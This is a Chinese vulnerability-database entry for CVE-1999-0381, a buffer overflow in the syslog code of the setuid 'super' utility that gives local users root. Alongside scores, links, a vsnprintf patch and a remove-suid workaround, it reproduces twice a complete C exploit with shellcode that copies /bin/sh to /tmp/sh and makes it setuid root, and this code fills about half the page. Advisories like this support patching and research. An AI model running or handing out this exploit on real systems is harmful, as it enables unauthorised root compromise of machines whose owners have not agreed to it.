CVE-1999-0381
CVSS7.2
发布时间 :1999-02-26 00:00:00
修订时间 :2008-09-09 08:34:26
NMCOES    

[原文]super 3.11.6 and other versions have a buffer overflow in the syslog utility which allows a local user to gain root access.


[CNNVD]Debian Super Syslog缓冲区溢出漏洞(CNNVD-199902-058)

        super 3.11.6及其它版本的syslog功能存在缓冲区溢出漏洞。本地用户可以利用漏洞访问根目录。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:debian:debian_linux:2.0Debian Debian Linux 2.0
cpe:/o:linux:linux_kernel:2.6.20.1Linux Kernel 2.6.20.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0381
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0381
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199902-058
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/342
(VENDOR_ADVISORY)  BID  342
http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.LNX.3.96.990225011801.12757A-100000@eleet
(UNKNOWN)  BUGTRAQ  19990225 SUPER buffer overflow

- 漏洞信息

Debian Super Syslog缓冲区溢出漏洞
高危 缓冲区溢出
1999-02-26 00:00:00 2005-10-20 00:00:00
本地  
        super 3.11.6及其它版本的syslog功能存在缓冲区溢出漏洞。本地用户可以利用漏洞访问根目录。

- 公告与补丁

        Remove the suid bit from the super binary or apply the following patch:
        --- error.c Thu Feb 25 00:38:25 1999
        +++ error.patch.c Thu Feb 25 01:07:53 1999
        @@ -321,7 +321,7 @@
        if (tag)
        StrLCat(newfmt, tag, sizeof(newfmt));
        va_start(ap, fmt);
        - (void) vsprintf(buf, newfmt, ap);
        + (void) vsnprintf(buf, sizeof(buf), newfmt, ap);
        va_end(ap);
        SysLog(error_priority, buf);
        }
        @@ -485,7 +485,7 @@
        StrLCat(newfmt, fmt, sizeof(newfmt));
        if (tag)
        StrLCat(newfmt, tag, sizeof(newfmt));
        - (void) vsprintf(buf, newfmt, ap);
        + (void) vsnprintf(buf, sizeof(buf), newfmt, ap);
        va_end(ap);
        SysLog(error_priority, buf);
        }

- 漏洞信息 (19270)

Debian Linux 2.0 Super Syslog Buffer Overflow Vulnerability (EDBID:19270)
linux local
1999-02-25 Verified
0 c0nd0r
N/A [点击下载]
source: http://www.securityfocus.com/bid/342/info


After the first super buffer overflow vulnerability was discovered, another appeared shortly after. This vulnerability exists when the syslog option is enabled. The overflow is in the file error.c, in the Error() function where the buf[MAXPRINT] buffer is used with no bounds checking. The consequences of this are local root compromise. 

--------------- SDI-super.c --------------------------------------

/*

* [ Sekure SDI ]

* [ Brazilian Info Security Team ]

* | ---------------------------------- ]

* | SUPER exploit for linux |

* | ---------------------------------- |

* | |

* | http://ssc.sekure.org |

* | Sekure SDI Secure Coding Team |

* | |

* | ---------------------------------- |

* | by c0nd0r <condor@sekure.org> |

* | ---------------------------------- |

* [ thanks for the ppl at sekure.org: ]

* [ jamez(shellcode), bishop, dumped, ]

* [ bahamas, fcon, vader, yuckfoo. ]

*

*

* This will exploit a buffer overflow condition in the log section of

* the SUPER program.

*

* It will create a suid bash owned by root at /tmp/sh.

* (It'll defeat the debian bash-2.xx protection against rootshell)

*

* Note: The SUPER program must be compiled with the SYSLOG option.

*

* also thanks people from #uground (irc.brasnet.org network)

*

*/

char shellcode[] =

"\xeb\x31\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36"

"\x8d\x5e\x0b\x89\x5e\x3a\x31\xc0\x88\x46\x07\x88"

"\x46\x0a\x88\x46\x31\x89\x46\x3e\xb0\x0b\x89\xf3"

"\x8d\x4e\x32\x8d\x56\x3e\xcd\x80\x31\xdb\x89\xd8"

"\x40\xcd\x80\xe8\xca\xff\xff\xff"

"/bin/sh -c cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh";

unsigned long getsp ( void) {

__asm__("mov %esp,%eax");

}

main ( int argc, char *argv[] ) {

char itamar[2040]; // ta mar mesmo

long addr;

int x, y, offset = 1000, align=0;

if ( argc > 1) offset = atoi(argv[1]);

addr = getsp() + offset;

for ( x = 0; x < (1410-strlen(shellcode)); x++)

itamar[x] = 0x90;

for ( ; y < strlen(shellcode); x++, y++)

itamar[x] = shellcode[y];

for ( ; x < 1500; x+=4) {

itamar[x ] = (addr & 0xff000000) >> 24;

itamar[x+1] = (addr & 0x000000ff);

itamar[x+2] = (addr & 0x0000ff00) >> 8;

itamar[x+3] = (addr & 0x00ff0000) >> 16;

}

itamar[x++] = '\0';

printf ( "\nwargames at 0x%x, offset %d\n", addr, offset);

printf ( "Look for a suid shell root owned at /tmp/sh\n");

execl ( "/usr/local/bin/super", "super", "-T",itamar, (char *) 0);

} 		

- 漏洞信息

5888
super Syslog Utility Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Workaround, Third-Party Solution
Exploit Public

- 漏洞描述

A local overflow exists in Debian Supper. The Debian fails to a uncheck buffer when a syslog option is enabled resulting in a steak overflow. With a specially crafted request, an attacker can gain root privilage resulting in a loss of confidentiality, integrity, and/or availability.

- 时间线

1999-02-25 1999-02-26
Unknow Unknow

- 解决方案

Debian has released a patch to address this vulnerability or as a workaround, remove the suid bit from the super binary(chmod u-s /usr/local/bin/super)

- 相关参考

- 漏洞作者

- 漏洞信息

Debian Super Syslog Buffer Overflow Vulnerability
Unknown 342
No Yes
1999-02-25 12:00:00 2009-07-11 12:16:00
First posted to BugTraq by c0nd0r <root@sekure.org> on February 25, 1999.

- 受影响的程序版本

Debian Linux 2.0

- 漏洞讨论

After the first super buffer overflow vulnerability was discovered, another appeared shortly after. This vulnerability exists when the syslog option is enabled. The overflow is in the file error.c, in the Error() function where the buf[MAXPRINT] buffer is used with no bounds checking. The consequences of this are local root compromise.

- 漏洞利用

--------------- SDI-super.c --------------------------------------

/*

* [ Sekure SDI ]

* [ Brazilian Info Security Team ]

* | ---------------------------------- ]

* | SUPER exploit for linux |

* | ---------------------------------- |

* | |

* | http://ssc.sekure.org |

* | Sekure SDI Secure Coding Team |

* | |

* | ---------------------------------- |

* | by c0nd0r &lt;condor@sekure.org&gt; |

* | ---------------------------------- |

* [ thanks for the ppl at sekure.org: ]

* [ jamez(shellcode), bishop, dumped, ]

* [ bahamas, fcon, vader, yuckfoo. ]

*

*

* This will exploit a buffer overflow condition in the log section of

* the SUPER program.

*

* It will create a suid bash owned by root at /tmp/sh.

* (It'll defeat the debian bash-2.xx protection against rootshell)

*

* Note: The SUPER program must be compiled with the SYSLOG option.

*

* also thanks people from #uground (irc.brasnet.org network)

*

*/

char shellcode[] =

"\xeb\x31\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36"

"\x8d\x5e\x0b\x89\x5e\x3a\x31\xc0\x88\x46\x07\x88"

"\x46\x0a\x88\x46\x31\x89\x46\x3e\xb0\x0b\x89\xf3"

"\x8d\x4e\x32\x8d\x56\x3e\xcd\x80\x31\xdb\x89\xd8"

"\x40\xcd\x80\xe8\xca\xff\xff\xff"

"/bin/sh -c cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh";

unsigned long getsp ( void) {

__asm__("mov %esp,%eax");

}

main ( int argc, char *argv[] ) {

char itamar[2040]; // ta mar mesmo

long addr;

int x, y, offset = 1000, align=0;

if ( argc &gt; 1) offset = atoi(argv[1]);

addr = getsp() + offset;

for ( x = 0; x &lt; (1410-strlen(shellcode)); x++)

itamar[x] = 0x90;

for ( ; y &lt; strlen(shellcode); x++, y++)

itamar[x] = shellcode[y];

for ( ; x &lt; 1500; x+=4) {

itamar[x ] = (addr &amp; 0xff000000) &gt;&gt; 24;

itamar[x+1] = (addr &amp; 0x000000ff);

itamar[x+2] = (addr &amp; 0x0000ff00) &gt;&gt; 8;

itamar[x+3] = (addr &amp; 0x00ff0000) &gt;&gt; 16;

}

itamar[x++] = '\0';

printf ( "\nwargames at 0x%x, offset %d\n", addr, offset);

printf ( "Look for a suid shell root owned at /tmp/sh\n");

execl ( "/usr/local/bin/super", "super", "-T",itamar, (char *) 0);

}

- 解决方案

Remove the suid bit from the super binary or apply the following patch:

--- error.c Thu Feb 25 00:38:25 1999

+++ error.patch.c Thu Feb 25 01:07:53 1999

@@ -321,7 +321,7 @@

if (tag)

StrLCat(newfmt, tag, sizeof(newfmt));

va_start(ap, fmt);

- (void) vsprintf(buf, newfmt, ap);

+ (void) vsnprintf(buf, sizeof(buf), newfmt, ap);

va_end(ap);

SysLog(error_priority, buf);

}

@@ -485,7 +485,7 @@

StrLCat(newfmt, fmt, sizeof(newfmt));

if (tag)

StrLCat(newfmt, tag, sizeof(newfmt));

- (void) vsprintf(buf, newfmt, ap);

+ (void) vsnprintf(buf, sizeof(buf), newfmt, ap);

va_end(ap);

SysLog(error_priority, buf);

}

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站